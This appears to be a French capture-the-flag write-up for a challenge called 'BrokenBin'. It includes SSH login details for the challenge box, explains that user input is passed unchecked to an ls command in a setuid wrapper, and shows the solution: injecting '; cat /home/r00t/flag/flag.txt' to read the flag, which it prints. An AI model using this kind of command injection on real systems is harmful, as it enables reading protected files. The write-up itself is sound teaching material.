BrokenBin

Catégorie: Système Difficulté: - Flag: CTFREI{3a5y_b1n4ry_3xpl0it}

Challenge

Description


Votre but est d'exploiter le binaire (en exécutant ./wrapper), n'oubliez pas de lire le fichier chall.py, qui est le programme exécuté par ./wrapper.

Le flag est situé ici : /home/r00t/flag/flag.txt

Nom d'utilisateur : jail Mot de passe : jail

ssh -p 4444 [email protected]

Solution

Le code source fournit nous montre que notre entrée est concaténée sans vérification à la commande ls puis exécutée. En chainant une seconde commande à la première, on peut en détourner le fonctionnement et lire le flag. Pour cela, on va simplement envoyer ; cat /home/r00t/flag/flag.txt

$ ssh -p 4444 [email protected]

[email protected]'s password: jail

Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 6.1.0-25-cloud-amd64 x86_64)

$ ls -al
total 32
drwxr-xr-x 1 root root  4096 Sep 19 14:00 .
drwxr-xr-x 1 root root  4096 Sep 19 14:00 ..
-rwxr-xr-x 1 root root   123 Sep 12 13:25 chall.py
-rwsr-xr-x 1 r00t r00t 16056 Sep 19 14:00 wrapper

$ ./wrapper
Rentre en input un directory que tu veux ls !
ls ; cat /home/r00t/flag/flag.txt
chall.py  wrapper
CTFREI{3a5y_b1n4ry_3xpl0it}

Dernière mise à jour

Cet article vous a-t-il été utile ?